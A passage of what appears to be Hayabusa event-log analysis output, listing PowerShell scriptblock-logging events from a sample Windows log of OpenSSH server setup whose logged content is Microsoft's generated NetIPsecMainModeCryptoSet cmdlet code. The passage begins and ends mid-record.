[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPrese",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"nt} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' -Alias '*' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_retur",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"nt} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' -Alias '*' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains 